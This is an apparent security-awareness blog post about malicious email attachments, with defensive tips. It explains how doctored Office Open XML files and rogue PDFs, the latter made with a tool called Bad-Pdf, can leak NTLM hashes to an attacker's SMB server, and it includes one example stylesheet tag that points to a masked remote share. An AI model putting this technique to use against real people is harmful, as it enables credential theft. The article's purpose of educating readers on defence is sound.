Email Attachments: To Click or Not to Click

By David Balaban

If a PDF drops into your mailbox, will you click it? What about an image file received from an unknown sender? Is it dangerous to download and open an archive? Do you know which email attachments are safe and which are dangerous?

According to the latest studies, 12% of people targeted by malicious emails click on the infected links or attachments.

There are a lot of different ways attackers may deliver a malicious payload to victims. Some are very effective while others can be easily identified. In this article, I will explain the main types of dangerous files hackers may send via email and what you can do to avoid falling victim.

Disclaimer: The methods described below are provided for informational purposes only. The author asks readers not to use this information for illegal purposes.



Most Microsoft Office files use Office Open XML, which is a zipped format created by Microsoft for representing presentations, tables, charts, and so on. The presence of XML can be seen in the file extension — there will be an “x” at the end such as in xlsx, docx, and pptx. You can open such Office files as text files with all attributes and tags.

Cybercriminals can edit an Office Open XML file and change the tags there. The attacker can add a link to a folder controlled by him. Then, when the victim launches the XML document, it will connect to the open public folder. When the victim connects using the Windows SMB protocol, Windows provides the NTLM hash. From this, the hacker can deduce the victim’s Windows login credentials.


First, the hacker creates an Office Open XML file (pptx, docx, or xlsx), but saves it as XML. Then they add the address of the public folder to which it should connect. Here is an example:

<?xml-stylesheettype=”mytest/xsl” href=”***.***.***.***\mytest\yellowsun.xsl“>


  • Use strong passwords (making it more difficult to crack the NTLM hash)
  • Use NTLMv2 for enhanced security
  • Block SMB traffic (TCP 139/445)
  • Contact the sender in case of receiving suspicious files

Rogue PDFs


In this case, attackers add a specific tag to the PDF file which includes a link to the attacker’s SMB server. Similar to the above example, once the user opens the rogue PDF file, his operating system sends an NTLM hash (NTLMv2) in order to connect to that folder.


To steal the NTLM hash, it is enough for hackers to use simple tools, for example, Bad-Pdf, and provide the execution rights to the Python file. Then they launch the Python script and add the file name and IP address.

Attackers masquerade such files as a PDF invoices, purchase receipts, and similar. When the victim opens the PDF, the hash is sent to the hacker.


  • Use strong passwords
  • Use NTLMv2
  • Block SMB traffic (TCP 139/445)
  • Contact the sender in case of receiving suspicious files

Read more here

Previous articleComplimentary Educational “IG Academy” Webinar Series – Starts Jan. 22 – Register Today!
Next articleThe Art of Document Restoration

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.